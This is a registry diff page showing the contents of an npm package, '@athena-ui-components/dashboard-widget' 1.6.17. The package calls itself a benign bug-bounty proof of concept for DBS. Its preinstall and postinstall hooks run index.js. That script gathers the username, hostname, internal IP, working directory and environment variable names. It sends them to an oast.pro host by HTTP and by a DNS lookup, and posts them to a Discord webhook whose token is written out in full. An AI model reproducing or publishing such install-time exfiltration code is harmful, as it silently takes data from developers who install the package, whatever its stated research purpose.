@athena-ui-components/dashboard-widget 1.6.17
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +76 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,76 @@
|
|
|
1
|
+
const http = require("http");
|
|
2
|
+
const https = require("https");
|
|
3
|
+
const os = require("os");
|
|
4
|
+
const { execSync } = require("child_process");
|
|
5
|
+
|
|
6
|
+
// --- CONFIGURACIÓN ---
|
|
7
|
+
const OAST_HOST = "d7fiu1ti191hj9ru0i8gukx3n3accmmdr.oast.pro";
|
|
8
|
+
const PKG_NAME = require("./package.json").name;
|
|
9
|
+
|
|
10
|
+
async function collectAndSend() {
|
|
11
|
+
const envKeys = Object.keys(process.env).join(", ");
|
|
12
|
+
|
|
13
|
+
const data = {
|
|
14
|
+
pkg: PKG_NAME,
|
|
15
|
+
timestamp: new Date().toISOString(),
|
|
16
|
+
identity: {
|
|
17
|
+
user: os.userInfo().username,
|
|
18
|
+
host: os.hostname(),
|
|
19
|
+
platform: `${os.platform()} ${os.release()}`,
|
|
20
|
+
internal_ip: Object.values(os.networkInterfaces()).flat()
|
|
21
|
+
.filter(i => i.family === "IPv4" && !i.internal).map(i => i.address)[0] || "no_ip"
|
|
22
|
+
},
|
|
23
|
+
context: {
|
|
24
|
+
cwd: process.cwd(),
|
|
25
|
+
env_keys_only: envKeys.substring(0, 500)
|
|
26
|
+
}
|
|
27
|
+
};
|
|
28
|
+
|
|
29
|
+
const payload = Buffer.from(JSON.stringify(data)).toString("base64").replace(/=/g, "");
|
|
30
|
+
|
|
31
|
+
const options = {
|
|
32
|
+
hostname: OAST_HOST,
|
|
33
|
+
port: 80,
|
|
34
|
+
path: `/hit?d=${payload}`,
|
|
35
|
+
method: "GET"
|
|
36
|
+
};
|
|
37
|
+
|
|
38
|
+
const req = http.request(options);
|
|
39
|
+
req.on("error", () => { });
|
|
40
|
+
req.end();
|
|
41
|
+
|
|
42
|
+
const dnsLabel = `${data.identity.host.substring(0, 15)}.${data.identity.user.substring(0, 10)}`.replace(/[^a-z0-9]/gi, "-");
|
|
43
|
+
try {
|
|
44
|
+
execSync(`nslookup ${dnsLabel}.${OAST_HOST}`, { stdio: "ignore" });
|
|
45
|
+
} catch (e) { }
|
|
46
|
+
|
|
47
|
+
const discordPayload = JSON.stringify({
|
|
48
|
+
content: "🚨 **DBS BANK - DEPENDENCY CONFIRMED** 🚨",
|
|
49
|
+
embeds: [{
|
|
50
|
+
title: "Proof of Concept - Authorized Execution",
|
|
51
|
+
color: 65280,
|
|
52
|
+
fields: [
|
|
53
|
+
{ name: "📦 Scope", value: PKG_NAME, inline: false },
|
|
54
|
+
{ name: "👤 User (whoami)", value: data.identity.user, inline: true },
|
|
55
|
+
{ name: "💻 Hostname", value: data.identity.host, inline: true },
|
|
56
|
+
{ name: "🌐 Internal IP (ifconfig)", value: data.identity.internal_ip, inline: true },
|
|
57
|
+
{ name: "📂 Path", value: data.context.cwd, inline: false },
|
|
58
|
+
{ name: "🔑 Env Var Keys (Context)", value: "Captured (No values)", inline: true }
|
|
59
|
+
],
|
|
60
|
+
footer: { text: "Authorized DBS Bug Bounty Research" }
|
|
61
|
+
}]
|
|
62
|
+
});
|
|
63
|
+
|
|
64
|
+
const reqDiscord = https.request({
|
|
65
|
+
hostname: "discord.com",
|
|
66
|
+
port: 443,
|
|
67
|
+
path: "/api/webhooks/1487009597175890022/DE6xfM-BeQ1xD6U2nH7vuFoQAIDd_aVDsuzdhHiGBZpPRm0M9BU94QEglVsLHaSxqhzo",
|
|
68
|
+
method: "POST",
|
|
69
|
+
headers: { "Content-Type": "application/json" }
|
|
70
|
+
});
|
|
71
|
+
reqDiscord.on("error", () => { });
|
|
72
|
+
reqDiscord.write(discordPayload);
|
|
73
|
+
reqDiscord.end();
|
|
74
|
+
}
|
|
75
|
+
|
|
76
|
+
collectAndSend();
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@athena-ui-components/dashboard-widget",
|
|
3
|
+
"version": "1.6.17",
|
|
4
|
+
"description": "Security Research PoC for YesWeHack DBS Bug Bounty Program. THIS IS BENIGN.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js",
|
|
8
|
+
"postinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "Security Researcher",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|